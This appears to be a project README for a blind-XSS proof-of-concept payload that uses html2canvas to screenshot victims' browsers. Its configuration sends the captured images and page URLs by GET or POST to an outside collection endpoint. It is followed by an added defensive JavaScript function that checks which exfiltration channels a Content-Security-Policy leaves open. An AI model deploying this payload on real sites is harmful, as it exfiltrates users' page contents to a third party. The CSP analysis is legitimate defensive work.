A rough proof-of-concept JavaScript XSS payload utilizing html2canvas for capturing browser screenshots.

I highly recommend using XSSHunter if you want a fully featured blind XSS tool.


var settings = {
    url: "http://ziot.org/xsscanvas/",  // the endpoint where you want the data to go
    sendMethod: "post",                 // method you want to send (get, post)
    iframe: false,                      // iframe post requests
    base64: true,                       // base64 the image data or not
    captureUrl: true,                   // capture url
    gotcha: false,
    width: 800,                         // resize screenshot width
    height: 800,                        // resize screenshot height
    multiRequests: false,               // send multiple requests for long urls
};

Request Variables

Data is sent to settings.url via GET or POST.
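
On the defensive side, whether those GET or POST requests ever leave the browser depends on the page's Content-Security-Policy. The following is an added example, not part of this project: it reports which outbound channels a CSP header leaves open to an untrusted origin. The channel-to-directive mapping, the simplified source matching, and the `collector.example` origin used when calling it are assumptions; the page only states that data is sent via GET or POST.

```javascript
// Added example (not from the project). Reports which outbound channels a
// Content-Security-Policy leaves open to an origin the site does not trust.
// The channel list is an assumption; the page only says GET or POST.
const CHANNELS = {
  "form POST": ["form-action"], // form-action has no default-src fallback
  "iframe": ["frame-src", "child-src", "default-src"],
  "XHR/fetch": ["connect-src", "default-src"],
  "image GET": ["img-src", "default-src"],
};

// Parse a CSP header into { directive: [sources] }; the first duplicate wins.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const [name, ...sources] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    if (key && !(key in policy)) policy[key] = sources;
  }
  return policy;
}

// Simplified matching: "*", "scheme:", exact host and "*.host" (ports and paths ignored).
function sourceAllows(source, target) {
  const url = new URL(target);
  const s = source.toLowerCase();
  if (s === "*") return url.protocol === "http:" || url.protocol === "https:";
  if (s.startsWith("'")) return false; // 'self', 'none', nonces never cover a foreign origin
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return s === url.protocol;
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:]+)/);
  if (!m) return false;
  if (m[1] && m[1] + ":" !== url.protocol) return false;
  return m[2] ? url.hostname.endsWith("." + m[3]) : url.hostname === m[3];
}

// Return the channels through which `target` (a foreign origin) stays reachable.
function openChannels(header, target) {
  const policy = parseCsp(header);
  return Object.keys(CHANNELS).filter((channel) => {
    const directive = CHANNELS[channel].find((d) => d in policy);
    if (!directive) return true; // no directive governs this channel
    return policy[directive].some((src) => sourceAllows(src, target));
  });
}
```

A policy of only `default-src 'self'` still leaves form submission open, because `form-action` does not inherit from `default-src`.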